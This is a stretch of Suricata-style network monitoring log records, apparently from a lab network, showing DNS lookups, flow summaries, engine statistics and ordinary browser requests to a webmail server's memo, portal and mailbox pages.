{"timestamp":"2020-02-29T00:00:46.000659+0000","flow_id":1630131894431570,"event_type":"flow","src_ip":"192.168.10.122","src_port":35446,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:55:45.536402+0000","end":"2020-02-28T23:55:45.644702+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:46.000727+0000","flow_id":1669280536703290,"event_type":"flow","src_ip":"192.168.10.81","src_port":52602,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":40,"pkts_toclient":40,"bytes_toserver":3859,"bytes_toclient":50594,"start":"2020-02-28T23:59:39.897338+0000","end":"2020-02-28T23:59:45.052284+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:46.095007+0000","flow_id":2122532734704388,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56423,"proto":"UDP","dns":{"type":"answer","id":31059,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:46.095007+0000","flow_id":2122532734704388,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56423,"proto":"UDP","dns":{"type":"answer","id":31059,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:00:46.141331+0000","flow_id":2118594249540551,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34686,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?memo=xGugmcpHiOSNHZkbtVVjAx7&memolist=zrRtpfxW0Ej7ISTKAw6mYJl&actionID=delete_memos","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?memo=xGugmcpHiOSNHZkbtVVjAx7&memolist=zrRtpfxW0Ej7ISTKAw6mYJl&actionID=modify_memo","http_method":"GET","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:00:46.155742+0000","flow_id":1206437685387358,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59463,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":20092,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:46.261061+0000","flow_id":1206437685387358,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59463,"proto":"UDP","dns":{"type":"answer","id":20092,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:46.261061+0000","flow_id":1206437685387358,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59463,"proto":"UDP","dns":{"type":"answer","id":20092,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:00:46.311420+0000","flow_id":2118594249540551,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34686,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?memo=xGugmcpHiOSNHZkbtVVjAx7&memolist=zrRtpfxW0Ej7ISTKAw6mYJl&actionID=modify_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3439}} {"timestamp":"2020-02-29T00:00:49.000173+0000","event_type":"stats","stats":{"uptime":13701,"capture":{"kernel_packets":131881,"kernel_drops":0},"decoder":{"pkts":131892,"bytes":91639214,"invalid":176,"ipv4":130475,"ipv6":8,"ethernet":131892,"raw":0,"null":0,"sll":0,"tcp":125527,"udp":4758,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2651,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2667,"synack":2658,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":135,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1699,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2168,"failed_udp":106},"tx":{"http":4381,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2244}},"flow_mgr":{"cl
osed_pruned":2624,"new_pruned":15,"est_pruned":2215,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65532,"rows_empty":2,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20170,"memcap_state":0,"memcap_global":0},"http":{"memuse":54466,"memcap":0}}} {"timestamp":"2020-02-29T00:00:51.000587+0000","flow_id":1764268018371447,"event_type":"flow","src_ip":"192.168.10.122","src_port":43607,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:50.134007+0000","end":"2020-02-28T23:55:50.242455+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:51.002278+0000","flow_id":1372824699014401,"event_type":"flow","src_ip":"192.168.10.122","src_port":36975,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:55:50.396545+0000","end":"2020-02-28T23:55:50.504392+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:51.314253+0000","flow_id":2118594249540551,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34686,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?memo=xGugmcpHiOSNHZkbtVVjAx7&memolist=zrRtpfxW0Ej7ISTKAw6mYJl&actionID=modify_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3439},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":16944,"tx_id":2}} 
{"timestamp":"2020-02-29T00:00:52.000622+0000","flow_id":931516809444240,"event_type":"flow","src_ip":"192.168.10.122","src_port":37867,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:51.686992+0000","end":"2020-02-28T23:55:51.794880+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:55.000149+0000","flow_id":423121546112077,"event_type":"flow","src_ip":"192.168.10.81","src_port":52610,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":20,"pkts_toclient":23,"bytes_toserver":4627,"bytes_toclient":18466,"start":"2020-02-28T23:59:47.060493+0000","end":"2020-02-28T23:59:53.055087+0000","age":6,"state":"closed","reason":"timeout","alerted":true},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:55.001755+0000","flow_id":1730797353766896,"event_type":"flow","src_ip":"192.168.10.81","src_port":52616,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1876,"bytes_toclient":5082,"start":"2020-02-28T23:59:47.987120+0000","end":"2020-02-28T23:59:53.055044+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:00:55.002779+0000","flow_id":2195066138595643,"event_type":"flow","src_ip":"192.168.10.81","src_port":52620,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1877,"bytes_toclient":4848,"start":"2020-02-28T23:59:47.987451+0000","end":"2020-02-28T23:59:53.056574+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:55.003615+0000","flow_id":1364127405772621,"event_type":"flow","src_ip":"192.168.10.81","src_port":52614,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1881,"bytes_toclient":4146,"start":"2020-02-28T23:59:47.986957+0000","end":"2020-02-28T23:59:53.056615+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:55.004287+0000","flow_id":815591362597012,"event_type":"flow","src_ip":"192.168.10.81","src_port":52618,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":17,"pkts_toclient":18,"bytes_toserver":3690,"bytes_toclient":16828,"start":"2020-02-28T23:59:47.987284+0000","end":"2020-02-28T23:59:53.171824+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:00:56.000163+0000","event_type":"stats","stats":{"uptime":13708,"capture":{"kernel_packets":131898,"kernel_drops":0},"decoder":{"pkts":131899,"bytes":91639628,"invalid":176,"ipv4":130480,"ipv6":8,"ethernet":131899,"raw":0,"null":0,"sll":0,"tcp":125532,"udp":4758,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2651,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2667,"synack":2658,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":135,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1699,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2168,"failed_udp":106},"tx":{"http":4381,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2244}},"flow_mgr":{"closed_pruned":2624,"new_pruned":15,"est_pruned":2218,"bypassed_pruned":0,"flows_checked":5,"flows_notimeout":5,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65530,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19178,"memcap_state":0,"memcap_global":0},"http":{"memuse":2257,"memcap":0}}} 
{"timestamp":"2020-02-29T00:00:56.001332+0000","flow_id":75620021953358,"event_type":"flow","src_ip":"192.168.10.122","src_port":58313,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:55.844622+0000","end":"2020-02-28T23:55:55.956115+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:56.001411+0000","flow_id":982596855727262,"event_type":"flow","src_ip":"192.168.10.122","src_port":44985,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:55.591006+0000","end":"2020-02-28T23:55:55.699356+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:57.000760+0000","flow_id":1865350074121926,"event_type":"flow","src_ip":"192.168.10.122","src_port":52535,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:56.245446+0000","end":"2020-02-28T23:55:56.353917+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:01:03.000383+0000","event_type":"stats","stats":{"uptime":13715,"capture":{"kernel_packets":131898,"kernel_drops":0},"decoder":{"pkts":131899,"bytes":91639628,"invalid":176,"ipv4":130480,"ipv6":8,"ethernet":131899,"raw":0,"null":0,"sll":0,"tcp":125532,"udp":4758,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094176},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2651,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2667,"synack":2658,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":135,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1699,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2168,"failed_udp":106},"tx":{"http":4381,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2244}},"flow_mgr":{"closed_pruned":2629,"new_pruned":15,"est_pruned":2221,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18185,"memcap_state":0,"memcap_global":0},"http":{"memuse":2257,"memcap":0}}} 
{"timestamp":"2020-02-29T00:01:04.000551+0000","flow_id":1157019786067524,"event_type":"flow","src_ip":"192.168.10.130","src_port":34678,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":14,"pkts_toclient":18,"bytes_toserver":2044,"bytes_toclient":16835,"start":"2020-02-28T23:59:20.376388+0000","end":"2020-02-29T00:00:03.894198+0000","age":43,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:07.000910+0000","flow_id":1265931569107445,"event_type":"flow","src_ip":"192.168.10.130","src_port":34680,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":12,"pkts_toclient":15,"bytes_toserver":1762,"bytes_toclient":13104,"start":"2020-02-28T23:59:56.365045+0000","end":"2020-02-29T00:00:06.130670+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:08.000546+0000","flow_id":741056500184452,"event_type":"flow","src_ip":"192.168.10.81","src_port":52612,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":49,"pkts_toclient":52,"bytes_toserver":11993,"bytes_toclient":43282,"start":"2020-02-28T23:59:47.963972+0000","end":"2020-02-29T00:00:07.960343+0000","age":20,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:01:10.000189+0000","event_type":"stats","stats":{"uptime":13722,"capture":{"kernel_packets":131898,"kernel_drops":0},"decoder":{"pkts":131899,"bytes":91639628,"invalid":176,"ipv4":130480,"ipv6":8,"ethernet":131899,"raw":0,"null":0,"sll":0,"tcp":125532,"udp":4758,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093312},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2651,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2667,"synack":2658,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":135,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1699,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2168,"failed_udp":106},"tx":{"http":4381,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2244}},"flow_mgr":{"closed_pruned":2632,"new_pruned":15,"est_pruned":2221,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65534,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18185,"memcap_state":0,"memcap_global":0},"http":{"memuse":2017,"memcap":0}}} 
{"timestamp":"2020-02-29T00:01:12.000518+0000","flow_id":922995595600655,"event_type":"flow","src_ip":"192.168.10.122","src_port":33317,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":2,"bytes_toserver":174,"bytes_toclient":284,"start":"2020-02-28T23:56:10.779023+0000","end":"2020-02-28T23:56:11.012016+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:13.484239+0000","flow_id":1227397127562127,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":57294,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":17057,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:13.598172+0000","flow_id":1227397127562127,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57294,"proto":"UDP","dns":{"type":"answer","id":17057,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:13.598172+0000","flow_id":1227397127562127,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57294,"proto":"UDP","dns":{"type":"answer","id":17057,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:13.778567+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52638,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7615}} 
{"timestamp":"2020-02-29T00:01:16.886820+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52638,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7615},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":39617,"tx_id":0}} {"timestamp":"2020-02-29T00:01:16.894066+0000","flow_id":413775703090290,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35934,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":61204,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:16.999282+0000","flow_id":413775703090290,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35934,"proto":"UDP","dns":{"type":"answer","id":61204,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:16.999282+0000","flow_id":413775703090290,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35934,"proto":"UDP","dns":{"type":"answer","id":61204,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:01:17.000126+0000","event_type":"stats","stats":{"uptime":13729,"capture":{"kernel_packets":131900,"kernel_drops":0},"decoder":{"pkts":131920,"bytes":91649600,"invalid":176,"ipv4":130501,"ipv6":8,"ethernet":131920,"raw":0,"null":0,"sll":0,"tcp":125551,"udp":4760,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093600},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2652,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2668,"synack":2659,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":135,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1700,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2169,"failed_udp":106},"tx":{"http":4382,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2245}},"flow_mgr":{"closed_pruned":2632,"new_pruned":15,"est_pruned":2222,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18514,"memcap_state":0,"memcap_global":0},"http":{"memuse":71339,"memcap":0}}} 
{"timestamp":"2020-02-29T00:01:17.000725+0000","flow_id":715535805556464,"event_type":"flow","src_ip":"192.168.10.130","src_port":34682,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":12,"bytes_toserver":1167,"bytes_toclient":9791,"start":"2020-02-29T00:00:03.894704+0000","end":"2020-02-29T00:00:16.593038+0000","age":13,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:17.119588+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52638,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8525}} {"timestamp":"2020-02-29T00:01:17.163421+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52638,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8525},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":36695,"tx_id":1}} 
{"timestamp":"2020-02-29T00:01:17.165928+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52638,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/mime.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":138}} 